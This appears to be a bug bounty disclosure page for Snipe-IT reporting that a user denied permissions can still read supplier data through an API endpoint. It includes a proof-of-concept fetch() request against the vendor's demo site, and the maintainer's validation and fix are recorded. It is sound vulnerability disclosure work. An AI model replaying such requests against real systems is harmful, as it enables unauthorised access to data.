Incorrect Privilege Assignment in snipe/snipe-it

Valid

Reported on

Feb 10th 2022


Description

unprivileged user can get supplier

Proof of Concept

1. Create regular user and set DENY to all permissions in asset and supplier models.
2. Login as the user and sent bellow request to get supplier

await fetch("https://demo.snipeitapp.com/api/v1/suppliers/selectlist?page=1", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "application/json, text/javascript, */*; q=0.01",
        "Accept-Language": "en-US,en;q=0.5",
        "X-Requested-With": "XMLHttpRequest",
        "X-CSRF-TOKEN": "hIQIBHcol9LRTCbEOt3zGSAxXmRMvAOXpnxtMzwy",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Site": "same-origin"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=314",
    "method": "GET",
    "mode": "cors"
});

Impact

unprivileged user can get supplier details

We are processing your report and will contact the snipe/snipe-it team within 24 hours. 4 months ago
We have contacted a member of the snipe/snipe-it team and are waiting to hear back 4 months ago
snipe
4 months ago

Maintainer


That's expected behavior

snipe validated this vulnerability 4 months ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
snipe confirmed that a fix has been merged on 10c26f 4 months ago
snipe has been awarded the fix bounty
to join this conversation